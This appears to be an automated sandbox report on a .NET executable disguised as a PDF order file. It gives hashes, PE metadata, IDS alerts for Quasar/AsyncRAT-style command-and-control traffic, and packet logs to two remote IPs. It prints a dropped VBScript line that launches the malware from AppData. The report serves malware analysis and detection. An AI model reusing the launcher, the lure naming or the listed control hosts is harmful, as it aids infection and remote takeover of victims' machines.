                                                                      MD5:00A50507901A9F31ABEFF6BCD32BFB7F
                                                                      SHA1:BB1DA90410A6F513EE18E074DE9ADBC82DD4F40A
                                                                      SHA-256:637D0D1659150F2FAA9F50D807B309AEA4D2BD263240C20B558E940028A6164F
                                                                      SHA-512:38DA08A5D46F465D75057385ADA508E7F88931F2E9D22A2D06461439E50C5653F15A6D66457057823D2C4DE7FEFC5933A49B74501E7D1B828C27B6950F1CCF33
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:p...... .........I...9..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1119
                                                                      Entropy (8bit):5.345080863654519
                                                                      Encrypted:false
                                                                      SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0Hj
                                                                      MD5:E6726BABA80C39624BADA32F0CCE6B54
                                                                      SHA1:4C769FA8A02DBE33AA9084040A9E6C70230334FA
                                                                      SHA-256:6A9F9C628B47AFC2A34A71826450A12D9293709BF977E72C04102F9DDD3705E0
                                                                      SHA-512:BBCCE0FCC59D29116253E71ECC786B8E3BA19D9A3124F36FEC9963C7F47016F145C76C18C5AD0FB6186ADEA69652BA99F29EF5AB5E71EFDD7EC07A82BB366960
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1484288
                                                                      Entropy (8bit):5.901132930281495
                                                                      Encrypted:false
                                                                      SSDEEP:12288:b/bzOGnF/lx54LOaJleaqIs/eBj52DYWQNwF/zsjVODN/B:bmGLZmx5gYWRaYJ/
                                                                      MD5:ABBFB2B5EBF6A24EEF7269BDE8E80640
                                                                      SHA1:99BE0B33DB303C353262F43D7C2E43A03B5E7B65
                                                                      SHA-256:56BD84E77DA1DE080C2D5C42B6F101574E7146B200026EA9468703D742EDEC10
                                                                      SHA-512:2DEDAEC26EDD4E9B23B31BDAB83FABD88884DA7958F4E7611FB7667CD3DDC6A795CF7B1B79ABCF0C6F13B03AC74763532705E316742F1052A1A5F6E5BB92DD6D
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                      Reputation:low
                                                                      Process:C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      Process:C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):88
                                                                      Entropy (8bit):4.717017813099475
                                                                      Encrypted:false
                                                                      SSDEEP:3:FER/n0eFHHot+kiEaKC5jh/NHHHn:FER/lFHIwknaZ5f
                                                                      MD5:7929BBBEAD99B7BB201B74661BC0F3B4
                                                                      SHA1:C958CE853A65FA326070A926F9F53DDC7B4003C0
                                                                      SHA-256:E0DC30C4BD7DDE280FC7A15CA080C556CE86EB2FB1FE70FA6C502BE0C6AD7D72
                                                                      SHA-512:C45337E271EB20098A9B228A39B0BB0F2360A9E1CA8CF521B3216F7413E21B88EE79BDA3485289CE96A3CB6FBC7BA4FF52BC2CE45C867C3F81676030C5B7A6DB
                                                                      Malicious:true
                                                                      Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\MaxGeneration.exe"""
                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):5.901132930281495
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:Order88983273293729387293828PDF.exe
                                                                      File size:1'484'288 bytes
                                                                      MD5:abbfb2b5ebf6a24eef7269bde8e80640
                                                                      SHA1:99be0b33db303c353262f43d7c2e43a03b5e7b65
                                                                      SHA256:56bd84e77da1de080c2d5c42b6f101574e7146b200026ea9468703d742edec10
                                                                      SHA512:2dedaec26edd4e9b23b31bdab83fabd88884da7958f4e7611fb7667cd3ddc6a795cf7b1b79abcf0c6f13b03ac74763532705e316742f1052a1a5f6e5bb92dd6d
                                                                      SSDEEP:12288:b/bzOGnF/lx54LOaJleaqIs/eBj52DYWQNwF/zsjVODN/B:bmGLZmx5gYWRaYJ/
                                                                      TLSH:63653C0923E8A635D6BF4B37AEF1091187B3E59293E1E79A4EC4B8E588437647D4C313
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x56bb9e
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x673A87C0 [Mon Nov 18 00:18:08 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x16bb44 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16c000 | 0x600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x16e000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x169ba4 | 0x169c00 | ffbd581f7ede7844803ae988fcedabab | False | 0.3337265678991016 | data | 5.904022662301607 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x16c000 | 0x600 | 0x600 | d7e51c07191df1b14b3fea46294a9141 | False | 0.4134114583333333 | data | 4.065739830960581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x16e000 | 0xc | 0x200 | e4eddcc9e55956b1ad52b3dca2a43bcd | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x16c0a0 | 0x30c | data | | | 0.4256410256410256
RT_MANIFEST | 0x16c3ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-18T08:17:06.768317+01002027619ET MALWARE Observed Malicious SSL Cert (Quasar CnC)172.11.156.803791192.168.2.449731TCP
                                                                      2024-11-18T08:17:06.768317+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert172.11.156.803791192.168.2.449731TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 18, 2024 08:17:01.934556961 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.934768915 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.975950003 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.976257086 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.976804018 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.976907969 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.977222919 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.977313042 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.977933884 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.978018999 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.017807007 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.017987013 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.018032074 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.018260956 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.019263983 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.019359112 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.019478083 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.019556046 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.020987988 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.021080017 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.021091938 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.021120071 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.021166086 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.021190882 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.021321058 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.021403074 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.022378922 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.022466898 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.023143053 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.023221970 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.023668051 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.023751974 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.024158955 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.024243116 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.024703979 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.024780989 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.025548935 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.025629044 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.026238918 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.026319981 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.026897907 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.026985884 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.027573109 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.027654886 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.028331041 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.028428078 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.029179096 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.029259920 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.029731035 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.029814959 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.030531883 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.030621052 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.031133890 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.031210899 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.031575918 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.031656981 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.032387972 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.032468081 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.033104897 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.033188105 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.033684969 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.033770084 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.034360886 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.034440041 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.051618099 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.051897049 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.093035936 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.093319893 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.093882084 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.093992949 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.094377995 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.094501972 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.094945908 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.095024109 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.134565115 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.134828091 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.135113955 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.135221958 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.136173010 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.136251926 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.136548042 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.136626959 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.136861086 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.136940956 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.137650013 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.137728930 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.138375998 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.138456106 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.138818026 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.138899088 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.139549971 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.139642000 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.140388966 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.140486956 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.140784025 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.140866995 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.141597033 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.141668081 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.142504930 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.142579079 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.143141985 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.143215895 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.143887043 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.143955946 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.144787073 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.144860983 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.145903111 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.145992994 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.146750927 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.146825075 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.147768021 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.147840023 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.148603916 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.148674965 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.149341106 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.149413109 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.149915934 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.150011063 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.150713921 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.150787115 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.151386023 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.151457071 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.152385950 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.152453899 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.152718067 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.152786970 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.153575897 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.153646946 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.153855085 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.153923988 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.210019112 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.210275888 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.210280895 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.210340023 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.210388899 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.210412979 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.210937023 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.211036921 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.212002039 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.212136984 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.212304115 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.212424040 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.252063036 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.252255917 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.252304077 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.252382040 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.253561974 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.253640890 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.253673077 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.253748894 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.254092932 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.254190922 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.254770041 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.254846096 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.255554914 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.255630970 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.255757093 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.255827904 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.256681919 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.256755114 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.257261038 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.257370949 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.257862091 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.257941961 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.258734941 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.258804083 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.259380102 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.259458065 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.260036945 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.260108948 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.260946035 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.261039019 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.261533976 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.261605978 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.262279987 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.262352943 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.264281034 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.264357090 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.264375925 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.264448881 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.265275002 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.265343904 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.265902996 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.265978098 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.266582966 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.266657114 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.267173052 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.267250061 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.268553019 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.268625975 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.268923998 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.269001007 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.269594908 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.269669056 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.270766020 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.270853996 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.271001101 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.271094084 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.271095037 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.271123886 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:02.271162987 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:02.271184921 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:14.659969091 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:14.662568092 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:14.662580967 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:14.662909031 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:14.703892946 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:14.744935989 CET49734443192.168.2.4185.78.221.73
